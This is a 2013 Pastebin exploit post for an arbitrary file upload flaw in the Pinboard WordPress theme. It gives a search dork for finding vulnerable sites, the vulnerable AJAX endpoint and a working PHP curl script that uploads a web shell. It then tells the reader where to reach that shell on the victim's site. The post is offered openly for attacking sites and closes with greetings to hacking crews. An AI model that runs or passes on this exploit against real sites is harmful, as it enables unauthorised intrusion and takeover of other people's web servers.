daily pastebin goal
20%
SHARE
TWEET

Exploit Title : Wordpress Themes Pinboard Arbitrary File Upl

Googleinurl Nov 26th, 2013 1,169 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Exploit Title : Wordpress Themes Pinboard Arbitrary File Upload Vulnerability
  2. #Author : ReC0ded
  3. #Vendor : http://themify.me/
  4. #Download : http://themify.me/themes/Pinboard
  5. #Date : 22, November 2013.
  6. #Type : php, html, htm, asp, etc.
  7. #Category : Web Applications
  8. #Vulnerability : File Upload
  9. #Tested On : Windows 7 32-bit | Google Chrome
  10.  
  11. #Dork : inurl:/wp-content/themes/pinboard/ | USE YOUR BRAIN =))
  12.  
  13. #Exploit : http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php
  14.  
  15. #POC :
  16.  
  17. <?php
  18. $uploadfile="ReC0ded.php";
  19. $ch = curl_init("http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
  20. curl_setopt($ch, CURLOPT_POST, true);
  21. curl_setopt($ch, CURLOPT_POSTFIELDS,
  22. array('Filedata'=>"@$uploadfile"));
  23. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24. $postResult = curl_exec($ch);
  25. curl_close($ch);
  26. print "$postResult";
  27. ?>
  28.  
  29. #Results See Your Shell On : http://victim/[PATH]/wp-content/themes/pinboard/uploads/{YOUR_FILE}.php
  30.  
  31. #################### Say Yes ####################
  32. $Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat
  33. $Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top